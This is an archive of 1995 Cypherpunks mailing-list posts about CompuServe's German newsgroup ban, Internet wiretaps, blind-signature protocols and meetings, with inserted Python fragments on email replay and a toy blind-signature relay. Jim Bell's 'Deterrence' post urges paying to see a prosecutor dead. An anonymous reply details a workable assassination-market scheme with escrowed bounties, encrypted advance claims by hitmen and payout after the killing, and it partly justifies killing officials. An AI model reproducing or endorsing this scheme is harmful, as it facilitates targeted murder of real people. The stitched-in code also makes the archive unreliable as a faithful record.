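# Constructed envelopes: the genuine delivery, the same signed text re-sent
# to somebody else, and the same signed text re-posted to another group.
_COMMON = "From: jane roe <jane@topsey.turvey.com>\nSubject: that's all folks!\n"
GENUINE = _COMMON + "To: john@box.com\n\n"
REPLAYED = _COMMON + "To: boss@example.com\n\n"
REPOSTED = _COMMON + "Newsgroups: alt.flame\n\n"
# Signed text with the courtesy block left out.
STRIPPED = "John, don't darken my door during the Christmas holidays.\n"

if __name__ == "__main__":
    for label, env, text in [("genuine", GENUINE, SIGNED_TEXT),
                             ("replayed", REPLAYED, SIGNED_TEXT),
                             ("reposted", REPOSTED, SIGNED_TEXT),
                             ("stripped", GENUINE, STRIPPED)]:
        print(label, check_courtesy_block(env, text) or "ok")
```
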






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 30 Dec 1995 12:02:58 +0800
To: dnowch2@teleport.com
Subject: "Deterrence"
Message-ID: <m0tVroR-00090UC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


In the 1960's movie, "Dr. Strangelove," the title character defined
"deterrence" as being "the art of making your enemies FEAR to attack you."  

As has been well-publicized recently, pressure from a German prosecutor had
induced Compuserve to cease access to a number of sex-related Internet
groups.  Clearly, neither Compuserve nor its users nor the Internet
community in general has demonstrated adequate DETERRENCE to him or people
in his position.

In my essay, "Assassination Politics," I pointed out that it would be
relatively easy to deter such official-type actions if enough of us simply
said, "NO!" and denominated it in terms of dollars and cents.  After all,
with four million Compuserve users, if they each were willing to donate a
penny to see this latter-day Fuhrer dead, that would be $40,000.  (Pardon me
if I don't translate this into marks and other currencies.)  

In practice, of course, if such a system were in place, it is  highly
unlikely that he would have even dared try to put pressure on Compuserve,
and Compuserve wouldn't have dared respond cooperatively to such outrageous
influence.

It is worth noting that if six million Jews had been willing to donate a
dime each in 1932 to see Hitler and his cronies dead, much of the late
thirties and forties would have ended up quite differently.  Some may argue
that today's situation isn't nearly as serious now as it was then, but then
again, the situation probably didn't really look very serious in 1932, did it?!?

WHEN, exactly, would it be appropriate to act?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HousePasley <byteback@ldd.net>
Date: Sat, 30 Dec 1995 10:18:48 +0800
To: cypherpunks@toad.com
Subject: (no subject)
Message-ID: <30E49366.18EB@ldd.net>
MIME-Version: 1.0
Content-Type: text/plain


Talk to me..my son has shoes...cypher this...
mays out of maggots, go arial.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Sun, 31 Dec 1995 02:44:02 +0800
To: <cypherpunks@toad.com>
Subject: Re: CHU_chu   Search Engines, Branded Communities
Message-ID: <9512300206.AA12772@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


riverrun

John Young writes:
>    12-29-95. FinTimes:
 
>    "Engine of the superhighway" muses on search engines and 
>    branded communities, and how their convergence will 
>    barb-wire lecher Tio Web from wild-legger Tia Juana.
>    CHU_chu

    I can't get much out of the second clause above.

    Much as I truly value John's notices of articles from the paper
world, I sometimes wish he would not obfuscate his text.

speaking for myself

Peter Trei
trei@process.com

riverrun




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Sat, 30 Dec 1995 12:33:12 +0800
To: cypherpunks@toad.com
Subject: Internet wiretap?
Message-ID: <199512300409.UAA28915@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


This tidbit was posted a few hours ago on c|net (12/29 4:00 PST).

        Thanks to a wiretap on the Internet, three people have been
        arrested for illegally selling and manufacturing cellular phone
        equipment and electronic devices over the Internet, according to
        Secret Service agent Brian Gimlett. This is the first time the
        Secret Service and the Drug Enforcement Administration were
        allowed to wiretap via the Internet, says Gimlett.

The rest of the story talks about an exchange of e-mail discussing the sale
of various nasty cellular accessories.  There is no information on exactly
what "wiretap" means or any other technical details.  Interesting to note
the DEA was in on it.

Crypto-relevance only if the perps were using a remailer (which I kind of
doubt).

Full story (quite short), at:
http://www.cnet.com/Content/News/Files/0,16,326,00.html

Joel





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Handler <grendel@netaxs.com>
Date: Sat, 30 Dec 1995 11:36:23 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Massey, CEO of Compuserve, on Internet
In-Reply-To: <ad099b2f180210046cfa@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.951229220043.25326A-100000@unix5.netaxs.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 29 Dec 1995, Timothy C. May wrote:

> Wow! I am watching the CEO of Compuserve being interviewed on CNBC,
> explaining how his company is "taking the high road by complying with the
> laws of Germany" in removing access to 200 Usenet groups.

A blatant lie.

Newsgroups: alt.online-service.compuserve,comp.org.eff.talk
From: tomklem@netcom.com (Tom Klemesrud)
Subject: Re: Compuserve lies about the Germans
Message-ID: <tomklemDKDBnr.15F@netcom.com>
 
[ ... ] 
Compuserve CEO Massey appeared on CNBC and said that Compuserve was
only obeying the (German) law.  However, the AP article makes it clear 
that there is no such German law--that there is only an investigation 
going on in Germany as to exactly what is on the internet.  Compuserve 
was not asked to censor anything, according to the AP article.  
Compuserve has apparently used this episode as an excuse to do what it
was already predisposed to do, in my opinion.

[ end ]

From: tc <72417.1514@compuserve.com>
Newsgroups: alt.online-service.compuserve,comp.org.eff.talk
Subject: Re: Compuserve lies about the Germans
Message-ID: <4c222o$jc3@dub-news-svc-4.compuserve.com>
 
CompuServe is starting to look worse and worse in this thing.  I'm
still waiting for the real story.  Here is an excerpt from a story on the
AP:
 
       <stuff deleted>
   Munich prosecutor Manfred Wick confirmed Friday that Bavarian state
police investigators searched CompuServe's networks and computers last
month for child pornography, but he would not say what they found.
   "We didn't threaten them with charges," Wick said.
   Arno Edelmann, a CompuServe product manager in Unterhaching,
Germany, said Friday that the company blocked access to 200
sex-oriented newsgroups in a portion of the Internet called Usenet.
   "It is perhaps an overreaction but we want to cooperate with the
Bavarian prosecutor's office," Edelmann said.
       <stuff deleted>
[ end ]

And herein lie the pitfalls of trying to establish a global ISP
presence.

I'm with Tom Klemesrud on this one. CI$ is trying to lick some boots
to get a position as a _capo_ when Der Revolution begins.

Michael, rec.arts.erotica and soc.support.youth.gay-lesbian-bi
moderator (both banned by CI$). As far as I'm concerned, CI$ is
no longer welcome to any articles from my group; I'll mangle the Path:
header as necessary to insure they never get there.
--
Michael Handler <grendel@netaxs.com>      <URL:http://www.netaxs.com/~grendel>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 30 Dec 1995 14:58:38 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: DIBS
Message-ID: <Pine.SUN.3.91.951229222945.1222A-100000@crl13.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

Eric Hughes and I are calling dibs for the FEBRUARY Cypherpunks
meeting.  On February 10, we will host the meeting at our offices
in downtown San Francisco (easily accessible by BART and Muni).
More details later.

After the meeting, I will be hosting a gala costume party in the
large, elegant Oakland house owned by two of my co-hosts.  I will 
soon be setting up an invitation on a web page provided by another
co-host, C'punk hero-of-the-revolution, Sameer.  Stay tuned.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sun, 31 Dec 1995 02:36:07 +0800
To: austin-cpunks@einstein.toad.com (Austin Cypherpunks)
Subject: January meeting
Message-ID: <199512300441.WAA01326@einstein>
MIME-Version: 1.0
Content-Type: text



Hi all,

Just a reminder that the next general meeting will be held on January 7,
1996 from 6-8pm at the Central Market HEB on N. Lamar at 42nd.

We will be discussing further issues related to the video and setting a
schedule of meetings and deadlines for various production points.

Hope to see you folks there!

                                             Jim Choate





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sat, 30 Dec 1995 13:05:55 +0800
To: austin-cpunks@einstein.toad.com (Austin Cypherpunks)
Subject: January meeting (fwd)
Message-ID: <199512300442.WAA01350@einstein>
MIME-Version: 1.0
Content-Type: text



Hi all,

Please make the date Saturday January 6, not Sunday January 7.


Forwarded message:
> From ravage@ssz.com Fri Dec 29 22:41:13 1995
> From: Jim Choate <ravage@ssz.com>
> Message-Id: <199512300441.WAA01326@einstein>
> Subject: January meeting
> To: austin-cpunks@ssz.com (Austin Cypherpunks)
> Date: Fri, 29 Dec 1995 22:41:11 -0600 (CST)
> Cc: cypherpunks@toad.com
> X-Mailer: ELM [version 2.4 PL23]
> Content-Type: text
> Content-Length: 373       
> 
> 
> Hi all,
> 
> Just a reminder that the next general meeting will be held on January 7,
> 1996 from 6-8pm at the Central Market HEB on N. Lamar at 42nd.
> 
> We will be discussing further issues related to the video and setting a
> schedule of meetings and deadlines for various production points.
> 
> Hope to see you folks there!
> 
>                                              Jim Choate
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Sat, 30 Dec 1995 12:59:44 +0800
To: cypherpunks@toad.com
Subject: http://www.gsa.gov/irms/ki/sipmo.htm
Message-ID: <9512300421.AA23481@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


As many of you probably already know, the US Postal Service is creating
a national public-key infrastructure for individuals (I've never heard
any mention of Corporate identities, not to say that there won't be any).

A few weeks ago the General Services Agency of the US Gov't had an open
working session of their Security Infrastructure Program Management Office
(SIPMO).  At that session they announced a pilot program for electronic
filing of federal tax returns, using the USPS infrastructure.

The URL in the subject line has not yet been updated to discuss the pilot;
right now it is basically an overview of SIPMO.

Anyone know more?
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daniel guerard <danielguerard@accent.net>
Date: Sat, 30 Dec 1995 13:21:51 +0800
To: cypherpunks@toad.com
Subject: (no subject)
Message-ID: <199512300455.XAA29856@server0.accent.net>
MIME-Version: 1.0
Content-Type: text/plain


please, mail list of server. Thank you






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <erc@dal1820.computek.net>
Date: Sat, 30 Dec 1995 14:28:32 +0800
To: tallpaul@pipeline.com (tallpaul)
Subject: Re: Zensoren ueber Alles
In-Reply-To: <199512300548.AAA02407@pipe8.nyc.pipeline.com>
Message-ID: <199512300604.AAA05518@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

This "Tall Paul" fellow said:

> Based on other news reports, I conclude that CompuServe lied in both areas.

So?  Companies lie all the time - the bigger the company, the bigger the 
lie, in my experience.  Companies are like governments - they will get 
away with what they can until caught.  Even then, they rarely stop - it 
just goes undercover.

> It did none of these things. It cut off all customers to an enormous number
> of groups. It inferrentially violated property rights (i.e. contracts) to
> customers promised internet access and now provided only a crippled version
> thereof. And it lied about the whole thing. 

Again, so?  All that it will do is to drive people away from Compu$erve 
into the arms of other service providers.  Maybe some of them will even 
figure out what a *real* ISP is...
- --
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMOTWTyS9AwzY9LDxAQH+OwQApSgooUc/ZgQgQm5xn1v4YxmI5jcVoJfR
b5pBCnJvcvTBld5C/6tTuOyqpnEvJD/oBlT+buhQDinvLYD97Z3oh65weEAZNrJ0
x2iTz1NzilPB5EDawIPs4lTELFaJLLdPVKZvgPaqhoUum3Sm3uHvgL1HcvnR+vt0
5hZW/NGlF4M=
=p6vI
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Sun, 31 Dec 1995 02:46:31 +0800
To: cypherpunks@toad.com
Subject: Zensoren ueber Alles
Message-ID: <199512300548.AAA02407@pipe8.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
From initial reports, the challenge to CompuServe did not come from the
German government. It did not come from the German Parliament. It did not
come from the German judiciary. 
 
It came from one (repeat one) prosecutor in one (repeat one) city. I also
suspect the U.S. journalists who reported the news may not know the
difference between a "prosecutor" and a "procurator." It is a significant
difference in many legal systems. (Not to slag U.S. journalists too hard
because I myself don't know which of the two Germany has.) 
 
The news reports on New York City television focused exclusively on the
"sexual" character of the banning, without directly mentioning that other
groups were also banned. 
 
"But," wrote Jonathan Oatis of Reuter in an article available on the
Clarinet news feed, "many more span a host of topics, including Barney the
dinosaur of children's television, Estonian politics and the New York
Yankees baseball team." 
 
Also included in the reports of news groups banned is the clari.news.sex
feed containing articles routinely filed by the Associated Press and
Reuter. It has also been reported that self-help recovery groups were
banned because the groups also had the word "sex" in the name. (In order to
save the victims it was necessary to destroy them!) 
 
How did the 11 o'clock news here in New York handle the story? 
 
Two of the three channels stated that CompuServe banned "chat rooms," not
news groups. The third got it right and reported on internet groups. The
two channels who spoke of the "chat room" ban also stated that the rooms
were banned because they contained "explicit" sexual images or graphics
"depicting" sexual topics. 
 
What can we infer? 
 
No single thing directly save for the inaccuracy of the reports. 
 
But certainly even national-level tv editors are not yet sufficiently
informed about the internet to know the difference between chat rooms and
news groups. I'd say that this level of ignorance rather impacts on their
ability to do their job in a professional fashion. (It also points to our
collective failure to adequately inform them.) 
 
Second, the editors -- whether under pressure of deadline, personal
psychological bias, or more sinister things -- can't pick up the idea that
the verbal ("chat") and the visual ("explicit" sexual images) are two
different things. 
 
Third, the sexual hysteria of the editors themselves significantly erodes
their ability to perform their jobs in an objective fashion. 
 
CompuServe also got off easy under initial press inquiry. 
 
One spokesman for the company announced they were required to do it. He
also stated that there was no way to cut the German customers off from the
groups while making the groups available to other CompuServe customers. 
 
Based on other news reports, I conclude that CompuServe lied in both areas.
(BTW, this is the first time I recall using the word "lie" on any post to
the cypherpunks list.) 
 
I also infer that CompuServe did not "roll over" on this issue. The
evidence shows, I think, that CompuServe is merely using one German
prosecutor (or procurator) as an excuse to implement their own desired and
previously prepared policy. 
 
CompuServe had, I think, several actions open. 
 
First, if the news reports that it was not "forced" to do anything by the
single German, it could simply not have done anything. 
 
Second, it could have appealed the decision by the prosecutor to the courts
(or submitted accurate information to the procurator and demanded that he
consider it.) 
 
Third, it could have narrowly targeted the banned groups to alt.binary
groups dealing with sexual issues. 
 
Fourth, it could have easily used software to cut off the feed to Germany. 
 
It did none of these things. It cut off all customers to an enormous number
of groups. It inferentially violated property rights (i.e. contracts) to
customers promised internet access and now provided only a crippled version
thereof. And it lied about the whole thing. 
 
Interestingly, none of the classic cypher-nasties were behind CompuServe's
decision. The "big statists" in Washington didn't tell CompuServe to do it.
The "hell with private property rights" bureaucrats didn't force CompuServe
to do it. 
 
Nor did the taxman. The taxmen historically rarely do; they do not seek to
ban "sin;" they tax it. The Treasury Department's Bureau of Booze, Butts &
Bazookas (aka Bureau of Alcohol, Tobacco, and Firearms) is not behind this
country's anti-booze, anti-butt, or anti-bazooka movement. They just tax
all three. (They may kill you if you buy, transfer, or manufacture your
bazooka without paying the US$ 200 (?) excise tax, but they're not out
there in the forefront of those pushing gun control.) 
 
Additional facts that will be forthcoming in the future will point, I
believe, to two things behind CompuServe's decision. The two leading causes
will, I predict, be: 
 
First, the growing abstract systemic fear in this society produced by a
society in crisis. This is a fear unnaturally re-directed at things like
PGP and anonymity by various political poo-bahs to both deflect the
citizens' fears from real causes and to rechannel that fear into areas
where the same poo-bahs can claim credit for doing the "something" in
"something has to be done." 
 
Second, the growing sexual hysteria within large sections of the population
that does not exist in an abstract form and is not being artificially
rechanneled but rather appealed to. 
 
CompuServe, in a rather brilliant move, managed to handle both groups, and
blame a foreign force to boot. But while brilliant tactically, I do not
believe they will succeed in continuing their policy. 
 
     --tallpaul




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sat, 30 Dec 1995 17:23:09 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: blind validation
In-Reply-To: <199512281849.MAA08259@proust.suba.com>
Message-ID: <199512300908.EAA07360@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Alex Strasheim writes:
[discussion and assumptions liberally elided]
> 1.   Alice initiates a transaction with Bob.  (Perhaps by asking
>      him for a file.)
> 
> 2.   Bob generates a random number and sends it back to Alice.
> 
> 3.   Alice blinds Bob's number and sends it to Trent, along with
>      proof of her validatability.
> 
> 4.   Trent checks Alice's proof, signs the blinded number, and
>      then returns it to Alice.
> 
> 5.   Alice unblinds Bob's number, then sends it to Bob.
> 
> 6.   Bob checks Trent's signature and makes sure that the number
>      he received matches the one he sent out.  Then Bob processes
>      Alice's transaction.
> 
> If Bob always follows this protocol, he can prove to Sam that
> he's followed the law.  Alice remains anonymous.  Alice can still
> transfer the file, but she has to give it away herself:  she
> can't give away the ability to get it directly from Bob without
> giving away the ability to prove Aliceness to Trent.  

I'm not convinced that your last point is true. It appears that the signed
Bobnet-access-number is still just a transferable ticket. Charlie can
place an order with Bob, forward the Bobnet-access-number to Alice, wait for
Alice & Trent to do the blinding & signing tango, forward the signed Bobnet-
access-number to Bob, and get the goods from Bob.
  
Charlie can't use the signed Bobnet-access-number to prove to Trent
that he's Alice. In fact, since it's unblinded, Charlie can't even prove
that he's linked to a particular validation performed by Trent. (If Alice
foolishly gave him the blinded version too, he could show that he shares
Alice's knowledge about this validation.) 

[...]
> The main problems that I can see with this protocol are:
> 
> 1.   It's vulnerable to traffic analysis.
> 2.   Sam has to trust Trent, which he may be unwilling to do.
> 3.   You can infer stuff about Alice from the kinds of requests
>      she makes of Trent.  Someone who always asks Trent for proof
>      that he's not a felon might tag himself as a person who buys
>      a lot of guns or ammunition, for example.

3. is OK as long as Alice trusts Trent. The trick is selecting a Trent
trusted by both Alice and Sam ;)

-Futplex	<futplex@pseudonym.com>
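
The relay described in the reply above, as an added example that is not part of the original posts: it assumes textbook RSA blind signatures for Trent (the thread does not name a scheme), a toy key built from two Mersenne primes, and a hypothetical `"alice-proof"` string standing in for Alice's proof of validatability. It shows what Bob's step-6 check can and cannot establish.

```python
import hashlib
import secrets
from math import gcd

# Toy textbook-RSA key for Trent (constructed for illustration: two Mersenne
# primes, far too small and structured for real use; no padding).
P, Q, E = 2**127 - 1, 2**89 - 1, 65537
N = P * Q
D = pow(E, -1, (P - 1) * (Q - 1))


def h(nonce: bytes) -> int:
    """Map Bob's random number into Z_N."""
    return int.from_bytes(hashlib.sha256(nonce).digest(), "big") % N


class Trent:
    """Validator: signs a blinded value for anyone who proves eligibility."""

    def __init__(self, eligible):
        self.eligible = set(eligible)
        self.seen = []                      # everything Trent ever learns

    def sign_blinded(self, proof: str, blinded: int) -> int:
        if proof not in self.eligible:      # step 4: check the proof
            raise PermissionError("validation failed")
        self.seen.append((proof, blinded))
        return pow(blinded, D, N)


class Bob:
    """Server: issues one number per order and redeems it once."""

    def __init__(self):
        self.pending = set()

    def new_order(self) -> bytes:           # step 2
        nonce = secrets.token_bytes(16)
        self.pending.add(nonce)
        return nonce

    def redeem(self, nonce: bytes, sig: int) -> bool:
        # Step 6: the number is one Bob sent out and Trent's signature verifies.
        if nonce not in self.pending or pow(sig, E, N) != h(nonce):
            return False
        self.pending.discard(nonce)
        return True


def alice_validate(nonce: bytes, trent: Trent, proof: str) -> int:
    """Steps 3-5: blind, have Trent sign, unblind. Returns Trent's signature."""
    while True:
        r = secrets.randbelow(N - 2) + 2
        if gcd(r, N) == 1:
            break
    blinded = (h(nonce) * pow(r, E, N)) % N
    return (trent.sign_blinded(proof, blinded) * pow(r, -1, N)) % N


def honest_run() -> bool:
    trent, bob = Trent({"alice-proof"}), Bob()
    nonce = bob.new_order()
    return bob.redeem(nonce, alice_validate(nonce, trent, "alice-proof"))


def relayed_run() -> dict:
    trent, bob = Trent({"alice-proof"}), Bob()
    nonce = bob.new_order()                             # Charlie places the order
    sig = alice_validate(nonce, trent, "alice-proof")   # Alice validates his number
    accepted = bob.redeem(nonce, sig)                   # Charlie hands it to Bob
    replayed = bob.redeem(nonce, sig)                   # same ticket, second try
    proof_seen, blinded_seen = trent.seen[0]
    try:
        trent.sign_blinded(str(sig), 1)     # the ticket itself is not a credential
        charlie_validated = True
    except PermissionError:
        charlie_validated = False
    return {
        "bob_accepts_charlie": accepted,
        "replay_accepted": replayed,
        "trent_saw_proof": proof_seen,
        "trent_record_matches_ticket": blinded_seen == h(nonce),
        "charlie_validated": charlie_validated,
    }
```

Bob's check binds the signature to the number he issued, not to whoever returns it, so the relayed run succeeds exactly once while Trent's record contains only Alice's proof and a blinded value unrelated to the ticket Bob sees.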




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 31 Dec 1995 06:49:55 +0800
To: cypherpunks@toad.com
Subject: 1OV_ert  Net Tap 1
Message-ID: <199512301147.GAA20962@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   12-30-95. NYP:

   Aided by the first court-approved Net wiretap, via
   Compuservile, three people have been jailed for an
   international plot to sell cel-tel cheaters.

   1OV_ert












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Sat, 30 Dec 1995 23:51:51 +0800
To: <cypherpunks@toad.com>
Subject: last straw
Message-ID: <v0300420cad0afe0c22d7@[129.46.82.92]>
MIME-Version: 1.0
Content-Type: text/plain


I've decided to cancel my CrampuNerve account and send the weasels a msg
telling them why. I encourage everyone here to do the same with your CI$
account (if you still have one). These [insert colorful expletive here]s
only understand one thing: cold ca$h. Thus, the only effective way to send
them an indication of one's displeasure at their poor precedent-setting is
to vote with one's wallet.

Any who are still unfortunate enough to rely on CI$ for Internet/Usenet
access are getting reamed price-wise anyway, not to mention suffering poor
reliability and now access, so maybe a few of them could also take this
opportunity to migrate to an ISP with some real "backbone."

CI$ is becoming redundant and now they're making themselves unappealing.
Convenient, economical dialups are now available to Europeans and any of us
Yanks who have to travel to Europe regularly through various
non-anus-kissing ISPs (xs4all, iSYS, etc.). Back in '90-'92 CI$ used to be
somewhat handy when travelling to Europe, but even then it was horribly
expensive when you tallied up their "surcharges" for dialing in through
Frankfurt, etc.

Good riddance, say I.

   dave

____________________________________________________________
"I prefer a real whorehouse to The Theatre." -Dorothy Parker






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@alpha.c2.org (Anonymous)
Date: Sun, 31 Dec 1995 01:17:07 +0800
To: cypherpunks@toad.com
Subject: NoneMurder, Inc. (was "Deterrence")
Message-ID: <199512301603.IAA25153@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> In my essay, "Assassination Politics," I pointed out that it would be
> relatively easy to deter such official-type actions if enough of us simply
> said, "NO!" and denominated it in terms of dollars and cents.  After all,
> with four million Compuserve users, if they each were willing to donate a
> penny to see this latter-day Fuhrer dead, that would be $40,000.  (Pardon
> me if I don't translate this into marks and other currencies.)
> 
> In practice, of course, if such a system were in place, it is  highly
> unlikely that he would have even dared try to put pressure on Compuserve,
> and Compuserve wouldn't have dared respond cooperatively to such
> outrageous influence.

In reality, four million compuserve users would not donate a penny each.
It is likely that a few hundred people who felt strongly about
the cause (and didn't mind a little bloodshed) might be willing to put up
funds in amounts of around $20.  

Of course nobody would want to advertise under their real name that they
have a contract out on some gummint agent.  This would require the
existence of a "Murder, Inc." as an escrow agent for the money.  (There
would likely be several such agents as it is unlikely people would trust
just one.)  Each person would give the escrow agent their contribution
toward the elimination of the gummint troublemaker.

Anyone who was willing to do the hit could post an encrypted claim, in
advance, stating the time and date or method he plans to use, and where to
send payment.  Once the act was done, the hitman posts the decryption key
so that everyone can see that he did it, and he collects the money.

If after some reasonable amount of time, nobody takes out the gubmint
asswipe, then the escrow agent returns all the money.

It's quite feasible, and not especially difficult.  The hardest thing is
convincing people that the escrow agent is trustworthy, and to convince
people that they really want to pay to have someone murdered.  There is
something a little chilling about that thought...  On the other hand, the
US government seems to feel that it's okay to kill people if they can get
away with it (Ruby Ridge, Waco, that guy in California (forgot his name)
who got shot on his ranch over bogus drug charges, etc.)  So although
murder is a Bad Thing(tm), the gubmint has set a very bad precedent in
making it look "okay".  Hence it becomes "okay" for people to do the same
to them (for example the recent Oklahoma incident).  It's okay for the
government to randomly pick on innocent people to make a statement, hence
it becomes okay to derail random trains to make a statement.  (For the
record, I am absolutely not defending what those people did to that Amtrak
train in Arizona, just pointing out the psychology of it.  If you're mad at
the government then fucking kill some government people - What the hell
did the amtrak passengers do to you?)  Unfortunately it seems to be becoming
okay to pick on random people to make an unrelated point (or just boost your
ego).  The government is using this tactic too, for example pick on a few
porno collectors to demonstrate your "authority" in cyberspace.  Same thing
with picking on random gun owners to make a statement against RKBA.  So
maybe it will become popular to kill a random politician (or anyone) just
to make a statement against the government.  This is turning into a rant.
I'll shut up now.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Sat, 30 Dec 1995 21:28:20 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Massey, CEO of Compuserve, on Internet
Message-ID: <m0tW16P-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Michael Handler writes:

: On Fri, 29 Dec 1995, Timothy C. May wrote:
: 
: > Wow! I am watching the CEO of Compuserve being interviewed on CNBC,
: > explaining how his company is "taking the high road by complying with the
: > laws of Germany" in removing access to 200 Usenet groups.
: 
: A blatant lie.

[Material deleted]

: CompuServe is starting to look worse and worse in this thing.  I'm
: still waiting for the real story.  Here is an excerpt from a story on the
: AP:
:  
:        <stuff deleted>
:    Munich prosecutor Manfred Wick confirmed Friday that Bavarian state
: police investigators searched CompuServe's networks and computers last
: month for child pornography, but he would not say what they found.
:    "We didn't threaten them with charges," Wick said.
:    Arno Edelmann, a CompuServe product manager in Unterhaching,
: Germany, said Friday that the company blocked access to 200
: sex-oriented newsgroups in a portion of the Internet called Usenet.
:    "It is perhaps an overreaction but we want to cooperate with the
: Bavarian prosecutor's office," Edelmann said.
:        <stuff deleted>
: [ end ]
: 
: And herein lie the pitfalls of trying to establish a global ISP
: presence.
: 

One should also notice that Bavaria is only one state in the German
Federal Republic; this case is more like Texas investigating
Compuserve than the United States federal government investigating
Compuserve.  Bavaria is the stronghold of what can properly be called
the (Catholic) Religious Right in Germany.  It should also be noticed
that in general German publications and television seem to be less
constrained in publishing materials that in the United States would be
called ``indecent'' by some than are United States publications and 
broadcasters.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous User <nobody@c2.org>
Date: Sun, 31 Dec 1995 02:22:47 +0800
To: cypherpunks@toad.com
Subject: Is Dr Fred Cohen a Loon???
Message-ID: <199512301723.JAA00902@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Trolling for Flames(just another anonymous poster destroying the 'net)
:)

The Subject says it all... I believe Fred suffers from a severely inflated
ego and suffers from the "false expert" syndrome detailed by various
self-help orgs... what say you fred??


     Another anon poster destroying the integrity of the net






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 31 Dec 1995 02:56:08 +0800
To: jk@digit.ee
Subject: Re: (fwd) DigiCash licencing?
Message-ID: <199512301815.KAA14002@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


Jyri Kaljundi <jk@digit.ee> wrote:
> Does anyone know about the terms and costs of licencing ecash software? I
> have tried contacting DigiCash directly with these questions, but have
> got no answers 

This experience (total lack of coherent response from Digicash) seems
to be widespread, on many issues.

The answer to your question has to be decided by DigiCash on a
case by case basis, and they are not noted for thinking on their
feet.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 31 Dec 1995 02:53:39 +0800
To: tallpaul@pipeline.com (tallpaul)
Subject: Re: Zensoren ueber Alles
Message-ID: <v02120d09ad0b2e12beef@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:54 12/30/95, tallpaul wrote:
[On the CI$ issue]

>I predict it will also be used for additional attacks on issues of
>encryption, privacy,  and anonymity. That is, I think we will see
>statements like "We need to be especially vigilant to make sure that the
>perverts are not smuggling banned material into the country via the
>internet. This means we have to block encryption, monitor user accounts
>even more carefully for potential perverts, etc. etc.

Nothing new here. Pornography and the other Three Horsemen will be used to
